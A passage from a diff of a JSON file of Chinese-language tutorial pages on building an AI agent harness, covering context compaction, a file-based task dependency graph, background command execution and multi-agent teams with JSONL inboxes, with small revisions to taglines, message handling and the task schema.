[Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## 工作原理\n\n1. **第一层 -- micro_compact**: 每次 LLM 调用前, 将旧的 tool result 替换为占位符。\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **第二层 -- auto_compact**: token 超过阈值时, 保存完整对话到磁盘, 让 LLM 做摘要。\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n {\"role\": \"assistant\", \"content\": \"Understood. Continuing.\"},\n ]\n```\n\n3. **第三层 -- manual compact**: `compact` 工具按需触发同样的摘要机制。\n\n4. 循环整合三层:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\n完整历史通过 transcript 保存在磁盘上。信息没有真正丢失, 只是移出了活跃上下文。\n\n## 相对 s05 的变更\n\n| 组件 | 之前 (s05) | 之后 (s06) |\n|----------------|------------------|--------------------------------|\n| Tools | 5 | 5 (基础 + compact) |\n| 上下文管理 | 无 | 三层压缩 |\n| Micro-compact | 无 | 旧结果 -> 占位符 |\n| Auto-compact | 无 | token 阈值触发 |\n| Transcripts | 无 | 保存到 .transcripts/ |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Read every Python file in the agents/ directory one by one` (观察 micro-compact 替换旧结果)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" + "content": "# s06: Context Compact (上下文压缩)\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"上下文总会满, 要有办法腾地方\"* -- 三层压缩策略, 换来无限会话。\n>\n> **Harness 层**: 压缩 -- 干净的记忆, 无限的会话。\n\n## 问题\n\n上下文窗口是有限的。读一个 1000 行的文件就吃掉 ~4000 token; 读 30 个文件、跑 20 条命令, 轻松突破 100k token。不压缩, Agent 根本没法在大项目里干活。\n\n## 解决方案\n\n三层压缩, 激进程度递增:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## 工作原理\n\n1. **第一层 -- micro_compact**: 每次 LLM 调用前, 将旧的 tool result 替换为占位符。\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **第二层 -- auto_compact**: token 超过阈值时, 保存完整对话到磁盘, 让 LLM 做摘要。\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n ]\n```\n\n3. **第三层 -- manual compact**: `compact` 工具按需触发同样的摘要机制。\n\n4. 循环整合三层:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\n完整历史通过 transcript 保存在磁盘上。信息没有真正丢失, 只是移出了活跃上下文。\n\n## 相对 s05 的变更\n\n| 组件 | 之前 (s05) | 之后 (s06) |\n|----------------|------------------|--------------------------------|\n| Tools | 5 | 5 (基础 + compact) |\n| 上下文管理 | 无 | 三层压缩 |\n| Micro-compact | 无 | 旧结果 -> 占位符 |\n| Auto-compact | 无 | token 阈值触发 |\n| Transcripts | 无 | 保存到 .transcripts/ |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Read every Python file in the agents/ directory one by one` (观察 micro-compact 替换旧结果)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" }, { "version": "s07", "locale": "zh", "title": "s07: Task System (任务系统)", - "content": "# s07: Task System (任务系统)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"大目标要拆成小任务, 排好序, 记在磁盘上\"* -- 文件持久化的任务图, 为多 agent 协作打基础。\n\n## 问题\n\ns03 的 TodoManager 只是内存中的扁平清单: 没有顺序、没有依赖、状态只有做完没做完。真实目标是有结构的 -- 任务 B 依赖任务 A, 任务 C 和 D 可以并行, 任务 E 要等 C 和 D 都完成。\n\n没有显式的关系, Agent 分不清什么能做、什么被卡住、什么能同时跑。而且清单只活在内存里, 上下文压缩 (s06) 一跑就没了。\n\n## 解决方案\n\n把扁平清单升级为持久化到磁盘的**任务图**。每个任务是一个 JSON 文件, 有状态、前置依赖 (`blockedBy`) 和后置依赖 (`blocks`)。任务图随时回答三个问题:\n\n- **什么可以做?** -- 状态为 `pending` 且 `blockedBy` 为空的任务。\n- **什么被卡住?** -- 等待前置任务完成的任务。\n- **什么做完了?** -- 状态为 `completed` 的任务, 完成时自动解锁后续任务。\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\n任务图 (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\n顺序: task 1 必须先完成, 才能开始 2 和 3\n并行: task 2 和 3 可以同时执行\n依赖: task 4 要等 2 和 3 都完成\n状态: pending -> in_progress -> completed\n```\n\n这个任务图是 s07 之后所有机制的协调骨架: 后台执行 (s08)、多 agent 团队 (s09+)、worktree 隔离 (s12) 都读写这同一个结构。\n\n## 工作原理\n\n1. **TaskManager**: 每个任务一个 JSON 文件, CRUD + 依赖图。\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"blocks\": [], \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **依赖解除**: 完成任务时, 自动将其 ID 从其他任务的 `blockedBy` 中移除, 解锁后续任务。\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **状态变更 + 依赖关联**: `update` 处理状态转换和依赖边。\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, add_blocks=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n self._save(task)\n```\n\n4. 四个任务工具加入 dispatch map。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\n从 s07 起, 任务图是多步工作的默认选择。s03 的 Todo 仍可用于单次会话内的快速清单。\n\n## 相对 s06 的变更\n\n| 组件 | 之前 (s06) | 之后 (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| 规划模型 | 扁平清单 (仅内存) | 带依赖关系的任务图 (磁盘) |\n| 关系 | 无 | `blockedBy` + `blocks` 边 |\n| 状态追踪 | 做完没做完 | `pending` -> `in_progress` -> `completed` |\n| 持久化 | 压缩后丢失 | 压缩和重启后存活 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" + "content": "# s07: Task System (任务系统)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"大目标要拆成小任务, 排好序, 记在磁盘上\"* -- 文件持久化的任务图, 为多 agent 协作打基础。\n>\n> **Harness 层**: 持久化任务 -- 比任何一次对话都长命的目标。\n\n## 问题\n\ns03 的 TodoManager 只是内存中的扁平清单: 没有顺序、没有依赖、状态只有做完没做完。真实目标是有结构的 -- 任务 B 依赖任务 A, 任务 C 和 D 可以并行, 任务 E 要等 C 和 D 都完成。\n\n没有显式的关系, Agent 分不清什么能做、什么被卡住、什么能同时跑。而且清单只活在内存里, 上下文压缩 (s06) 一跑就没了。\n\n## 解决方案\n\n把扁平清单升级为持久化到磁盘的**任务图**。每个任务是一个 JSON 文件, 有状态、前置依赖 (`blockedBy`)。任务图随时回答三个问题:\n\n- **什么可以做?** -- 状态为 `pending` 且 `blockedBy` 为空的任务。\n- **什么被卡住?** -- 等待前置任务完成的任务。\n- **什么做完了?** -- 状态为 `completed` 的任务, 完成时自动解锁后续任务。\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\n任务图 (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\n顺序: task 1 必须先完成, 才能开始 2 和 3\n并行: task 2 和 3 可以同时执行\n依赖: task 4 要等 2 和 3 都完成\n状态: pending -> in_progress -> completed\n```\n\n这个任务图是 s07 之后所有机制的协调骨架: 后台执行 (s08)、多 agent 团队 (s09+)、worktree 隔离 (s12) 都读写这同一个结构。\n\n## 工作原理\n\n1. **TaskManager**: 每个任务一个 JSON 文件, CRUD + 依赖图。\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **依赖解除**: 完成任务时, 自动将其 ID 从其他任务的 `blockedBy` 中移除, 解锁后续任务。\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **状态变更 + 依赖关联**: `update` 处理状态转换和依赖边。\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, remove_blocked_by=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n if add_blocked_by:\n task[\"blockedBy\"] = list(set(task[\"blockedBy\"] + add_blocked_by))\n if remove_blocked_by:\n task[\"blockedBy\"] = [x for x in task[\"blockedBy\"] if x not in remove_blocked_by]\n self._save(task)\n```\n\n4. 四个任务工具加入 dispatch map。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\n从 s07 起, 任务图是多步工作的默认选择。s03 的 Todo 仍可用于单次会话内的快速清单。\n\n## 相对 s06 的变更\n\n| 组件 | 之前 (s06) | 之后 (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| 规划模型 | 扁平清单 (仅内存) | 带依赖关系的任务图 (磁盘) |\n| 关系 | 无 | `blockedBy` 边 |\n| 状态追踪 | 做完没做完 | `pending` -> `in_progress` -> `completed` |\n| 持久化 | 压缩后丢失 | 压缩和重启后存活 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" }, { "version": "s08", "locale": "zh", "title": "s08: Background Tasks (后台任务)", - "content": "# s08: Background Tasks (后台任务)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"慢操作丢后台, agent 继续想下一步\"* -- 后台线程跑命令, 完成后注入通知。\n\n## 问题\n\n有些命令要跑好几分钟: `npm install`、`pytest`、`docker build`。阻塞式循环下模型只能干等。用户说 \"装依赖, 顺便建个配置文件\", Agent 却只能一个一个来。\n\n## 解决方案\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## 工作原理\n\n1. BackgroundManager 用线程安全的通知队列追踪任务。\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()` 启动守护线程, 立即返回。\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. 子进程完成后, 结果进入通知队列。\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. 每次 LLM 调用前排空通知队列。\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted background results.\"})\n response = client.messages.create(...)\n```\n\n循环保持单线程。只有子进程 I/O 被并行化。\n\n## 相对 s07 的变更\n\n| 组件 | 之前 (s07) | 之后 (s08) |\n|----------------|------------------|------------------------------------|\n| Tools | 8 | 6 (基础 + background_run + check) |\n| 执行方式 | 仅阻塞 | 阻塞 + 后台线程 |\n| 通知机制 | 无 | 每轮排空的队列 |\n| 并发 | 无 | 守护线程 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" + "content": "# s08: Background Tasks (后台任务)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"慢操作丢后台, agent 继续想下一步\"* -- 后台线程跑命令, 完成后注入通知。\n>\n> **Harness 层**: 后台执行 -- 模型继续思考, harness 负责等待。\n\n## 问题\n\n有些命令要跑好几分钟: `npm install`、`pytest`、`docker build`。阻塞式循环下模型只能干等。用户说 \"装依赖, 顺便建个配置文件\", Agent 却只能一个一个来。\n\n## 解决方案\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## 工作原理\n\n1. BackgroundManager 用线程安全的通知队列追踪任务。\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()` 启动守护线程, 立即返回。\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. 子进程完成后, 结果进入通知队列。\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. 每次 LLM 调用前排空通知队列。\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n response = client.messages.create(...)\n```\n\n循环保持单线程。只有子进程 I/O 被并行化。\n\n## 相对 s07 的变更\n\n| 组件 | 之前 (s07) | 之后 (s08) |\n|----------------|------------------|------------------------------------|\n| Tools | 8 | 6 (基础 + background_run + check) |\n| 执行方式 | 仅阻塞 | 阻塞 + 后台线程 |\n| 通知机制 | 无 | 每轮排空的队列 |\n| 并发 | 无 | 守护线程 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" }, { "version": "s09", "locale": "zh", "title": "s09: Agent Teams (Agent 团队)", - "content": "# s09: Agent Teams (Agent 团队)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"任务太大一个人干不完, 要能分给队友\"* -- 持久化队友 + JSONL 邮箱。\n\n## 问题\n\nSubagent (s04) 是一次性的: 生成、干活、返回摘要、消亡。没有身份, 没有跨调用的记忆。Background Tasks (s08) 能跑 shell 命令, 但做不了 LLM 引导的决策。\n\n真正的团队协作需要三样东西: (1) 能跨多轮对话存活的持久 Agent, (2) 身份和生命周期管理, (3) Agent 之间的通信通道。\n\n## 解决方案\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## 工作原理\n\n1. TeammateManager 通过 config.json 维护团队名册。\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()` 创建队友并在线程中启动 agent loop。\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: append-only 的 JSONL 收件箱。`send()` 追加一行; `read_inbox()` 读取全部并清空。\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. 每个队友在每次 LLM 调用前检查收件箱, 将消息注入上下文。\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## 相对 s08 的变更\n\n| 组件 | 之前 (s08) | 之后 (s09) |\n|----------------|------------------|------------------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agent 数量 | 单一 | 领导 + N 个队友 |\n| 持久化 | 无 | config.json + JSONL 收件箱 |\n| 线程 | 后台命令 | 每线程完整 agent loop |\n| 生命周期 | 一次性 | idle -> working -> idle |\n| 通信 | 无 | message + broadcast |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. 输入 `/team` 查看团队名册和状态\n5. 输入 `/inbox` 手动检查领导的收件箱\n" + "content": "# s09: Agent Teams (Agent 团队)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"任务太大一个人干不完, 要能分给队友\"* -- 持久化队友 + JSONL 邮箱。\n>\n> **Harness 层**: 团队邮箱 -- 多个模型, 通过文件协调。\n\n## 问题\n\nSubagent (s04) 是一次性的: 生成、干活、返回摘要、消亡。没有身份, 没有跨调用的记忆。Background Tasks (s08) 能跑 shell 命令, 但做不了 LLM 引导的决策。\n\n真正的团队协作需要三样东西: (1) 能跨多轮对话存活的持久 Agent, (2) 身份和生命周期管理, (3) Agent 之间的通信通道。\n\n## 解决方案\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## 工作原理\n\n1. TeammateManager 通过 config.json 维护团队名册。\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()` 创建队友并在线程中启动 agent loop。\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: append-only 的 JSONL 收件箱。`send()` 追加一行; `read_inbox()` 读取全部并清空。\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. 每个队友在每次 LLM 调用前检查收件箱, 将消息注入上下文。\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## 相对 s08 的变更\n\n| 组件 | 之前 (s08) | 之后 (s09) |\n|----------------|------------------|------------------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agent 数量 | 单一 | 领导 + N 个队友 |\n| 持久化 | 无 | config.json + JSONL 收件箱 |\n| 线程 | 后台命令 | 每线程完整 agent loop |\n| 生命周期 | 一次性 | idle -> working -> idle |\n| 通信 | 无 | message + broadcast |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. 输入 `/team` 查看团队名册和状态\n5. 输入 `/inbox` 手动检查领导的收件箱\n" }, { "version": "s10", "locale": "zh", "title": "s10: Team Protocols (团队协议)", - "content": "# s10: Team Protocols (团队协议)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> 